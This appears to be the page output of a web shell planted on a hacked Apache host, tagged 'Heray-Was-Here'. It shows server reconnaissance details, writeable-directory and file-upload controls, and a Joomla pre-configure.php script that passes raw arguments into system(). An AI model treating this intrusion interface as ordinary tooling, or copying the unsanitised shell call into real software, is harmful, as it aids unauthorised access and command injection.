Heray-Was-Here
Server : Apache
System : Linux infong-uk56 4.4.400-icpu-108 #2 SMP Wed Feb 11 11:51:01 UTC 2026 x86_64
User : u78863098 ( 10368940)
PHP Version : 8.4.24
Disable Function : NONE
Directory :  /homepages/oneclick/joomla/3.3.6/1/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /homepages/oneclick/joomla/3.3.6/1/scripts/pre-configure.php
<?php
if(count($argv) != 3)
{
    print "Usage: pre-configure.php uid gid\n";
    exit(1);
}

$uid = $argv[1];
$gid = $argv[2];

$my_web_dir = getenv("WEB___DIR");
while($my_web_dir[strlen($my_web_dir)-1] == "/"){
        $my_web_dir = substr($my_web_dir, 0, strlen($my_web_dir)-1);
}

if(file_exists($my_web_dir."/configuration.php")){
        system("chown $uid:$gid " .  $my_web_dir."/configuration.php");
}
?>

Hry